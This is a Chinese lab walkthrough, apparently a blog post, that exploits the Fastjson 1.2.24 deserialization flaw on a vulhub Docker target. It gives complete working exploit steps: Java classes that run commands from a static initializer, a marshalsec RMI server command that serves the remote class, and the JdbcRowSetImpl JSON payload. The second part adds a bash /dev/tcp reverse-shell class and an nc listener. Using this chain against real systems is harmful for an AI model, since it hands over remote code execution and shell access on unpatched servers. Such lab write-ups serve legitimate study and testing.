目录
一. 前期准备:
? ? ? ? 1. 安装jdk,并配置环境:Kali安装JDK 1.8的详细过程_m0_54899775的博客-CSDN博客
? ? ? ? 2.安装maven,并配置环境:kali linux安装maven_m0_54899775的博客-CSDN博客
? ? ? ? 3.安装vulhub靶场环境:Kali Linux 2020安装vulhub_m0_54899775的博客-CSDN博客
? ? ? ? 4.安装反序列化工具marshalsec:下载和安装marshalsec_m0_54899775的博客-CSDN博客
二. fastjson简介
????????Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。使用比较广泛。
三. 漏洞复现(一):创建文件
? ? ? ? 1.启动靶场:
docker-compose up -d先启动vulhub的fastjson 1.2.24漏洞环境
Docker开启的8090端口
假设我们目标IP为192.168.6.134(虚拟机ip),此时我们访问192.168.6.134:8090
????????2.在vulhub下的fastjson 1.2.24文件夹下保存以下代码为TouchFile.java文件(文件名可随便起):
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success111111111"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
? ? ? ? 3.编译.java文件,生成.class文件:
javac TouchFile.java
? ? ? ? 4.把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在的目录,Python起一个http服务。
python -m SimpleHTTPServer 4444然后查看此网址,会发现新建的文件:
? ? ? ? 5.使用marshalsec项目,启动RMI服务,监听9999端口并加载远程类TouchFile.class:
cd marshalsec/
mvn clean package -DskipTests
出现以下画面表示编译成功:
成功以后会在target目录下生成marshalsec-0.0.3-SNAPSHOT-all.jar文件
? ? ? ? 6.接下来开启RMI服务
marshalsec-master/target# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.6.134:4444/#TouchFile" 9999
?其中ip地址为上面开通http服务的网址(我这里为虚拟机的ip:4444).
7.刷新靶场(http://192.168.6.134:8090)的链接,抓包后改GET包为POST包,然后在发送的请求数据包中输入以下payload:?
Content-Type: application/json
Content-Length: 169
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.6.134:9999/TouchFile",
"autoCommit":true
}
}
8.go运行。?
?11.查看docker中新建文件情况:
(1)查看运行中的docker
docker ps(2)进入docker:
docker exec -it 1e149b66db15 /bin/bash(3)查看目录:
?三. 漏洞复现(二):反弹shell
?????????1.启动靶场:
docker-compose up -d先启动vulhub的fastjson 1.2.24漏洞环境
Docker开启的8090端口
假设我们目标IP为192.168.6.134(虚拟机ip),此时我们访问192.168.6.134:8090
????????2.在vulhub下的fastjson 1.2.24文件夹下保存以下代码为TouchFile.java文件(文件名可随便起):
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.6.134/2333 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
? ? ? ? 3.编译.java文件,生成.class文件:
javac TouchFile.java
? ? ? ? 4.把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在的目录,Python起一个http服务。
python -m SimpleHTTPServer 4444然后查看此网址,会发现新建的文件:
? ? ? ? 5.使用marshalsec项目,启动RMI服务,监听9999端口并加载远程类TouchFile.class:
cd marshalsec/
mvn clean package -DskipTests
出现以下画面表示编译成功:
成功以后会在target目录下生成marshalsec-0.0.3-SNAPSHOT-all.jar文件
? ? ? ? 6.接下来开启RMI服务
marshalsec-master/target# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.6.134:4444/#TouchFile" 9999
?其中ip地址为上面开通http服务的网址(我这里为虚拟机的ip:4444).
7.开启payload中的端口,进行监听:
nc -lvp 2333
8.刷新靶场(http://192.168.6.134:8090)的链接,抓包后改GET包为POST包,然后在发送的请求数据包中输入以下payload:?
Content-Type: application/json
Content-Length: 169
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.6.134:9999/TouchFile",
"autoCommit":true
}
}
8.go运行?
点击go,都会有反应?
?成功反弹shell。